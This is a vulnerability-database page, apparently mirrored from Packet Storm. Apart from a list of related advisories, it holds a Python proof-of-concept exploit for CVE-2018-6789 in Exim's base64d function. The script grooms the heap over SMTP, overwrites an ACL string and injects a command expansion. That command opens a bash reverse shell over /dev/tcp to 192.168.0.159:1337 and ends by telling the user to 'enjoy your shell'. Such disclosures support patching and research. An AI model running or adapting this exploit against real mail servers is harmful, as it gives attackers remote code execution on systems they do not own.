Exim base64d Remote Code Execution

🗓️ 03 May 2018 00:00:00Reported by straight_blastType

packetstorm🔗 packetstormsecurity.com👁 139 Views

Exim Base64d Remote Code Executio

Reporter	Title	Published	Views	Family All 92
0day.today	Exim < 4.90.1 - base64d Remote Code Execution Exploit	2 May 201800:00	–	zdt
0day.today	exim 4.90 - Remote Code Execution Exploit	24 Oct 201800:00	–	zdt
0day.today	Exim base64d Buffer Overflow Exploit	3 Jun 202100:00	–	zdt
FreeBSD	exim -- a buffer overflow vulnerability, remote code execution	5 Feb 201800:00	–	freebsd
GithubExploit	Exploit for Classic Buffer Overflow in Exim	10 Oct 201909:36	–	githubexploit
GithubExploit	Exploit for Classic Buffer Overflow in Exim	2 Mar 202016:53	–	githubexploit
Tenable Nessus	Exim < 4.90.1 Remote Code Execution	6 Mar 201800:00	–	nessus
Tenable Nessus	Amazon Linux AMI : exim (ALAS-2018-970)	9 Mar 201800:00	–	nessus
Tenable Nessus	Debian DLA-1274-1 : exim4 security update	12 Feb 201800:00	–	nessus
Tenable Nessus	Debian DSA-4110-1 : exim4 - security update	12 Feb 201800:00	–	nessus

`#!/usr/bin/python  
import time  
import socket  
import struct  
s = None  
f = None  
def logo():  
print  
print " CVE-2018-6789 Poc Exploit"  
print "@straight_blast ; [email protected]"  
print  
def connect(host, port):  
global s  
global f  
s = socket.create_connection((host,port))  
f = s.makefile('rw', bufsize=0)  
def p(v):  
return struct.pack("<Q", v)  
def readuntil(delim='\n'):  
data = ''  
while not data.endswith(delim):  
data += f.read(1)  
return data  
def write(data):  
f.write(data + "\n")  
def ehlo(v):  
write("EHLO " + v)  
readuntil('HELP')  
def unrec(v):  
write(v)  
readuntil('command')  
def auth_plain(v):  
encode = v.encode('base64').replace('\n','').replace('=','')  
write("AUTH PLAIN " + encode)  
readuntil('data')  
def one_byte_overwrite():  
v = "C" * 8200  
encode = v.encode('base64').replace('\n','').replace('=','')  
encode = encode[:-1] + "PE"  
write("AUTH PLAIN " + encode)  
readuntil('data')  
def exploit():  
logo()  
connect('localhost', 25)  
print "[1] connected to target"  
time.sleep(0.5)   
  
ehlo("A" * 8000)   
ehlo("B" * 16)  
print "[2] created free chunk size 0x6060 in unsorted bin"  
  
unrec("\xff" * 2000)  
ehlo("D" * 8200)  
one_byte_overwrite()  
print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0"  
  
fake_header = p(0)   
fake_header += p(0x1f51)  
auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))  
print "[4] patched chunk with fake header so extended chunk can be freed"  
  
ehlo("F" * 16)  
print "[5] freed extended chunk"  
  
unrec("\xff" * 2000)  
unrec("\xff" * 2000)  
print "[6] occupied 1st and 3rd item in unsorted bin with fillers"  
  
fake_header = p(0x4110)  
fake_header += p(0x1f50)   
auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))  
print "[7] patched chunk with fake header so extended chunk can be allocated"  
  
address = 0x55d7e5864480  
auth_plain("H" * 8200 + p(0x2021) + p(address) + p(0x2008) + "H" * 184)  
print "[8] overwrite 'next' pointer with ACL store block address"  
  
ehlo("I" * 16)  
print "[9] freed the ACL store block"  
  
acl_smtp_rcpt_offset = 288  
local_host = '192.168.0.159'  
local_port = 1337  
cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""  
cmd_expansion_string = "${run{" + cmd + "}}\0"  
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))   
print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"  
  
write("MAIL FROM:<[email protected]>")  
readuntil("OK")  
write("RCPT TO:<[email protected]>")   
print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"  
print  
if __name__ == '__main__':  
exploit()  
  
  
`

03 May 2018 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.86592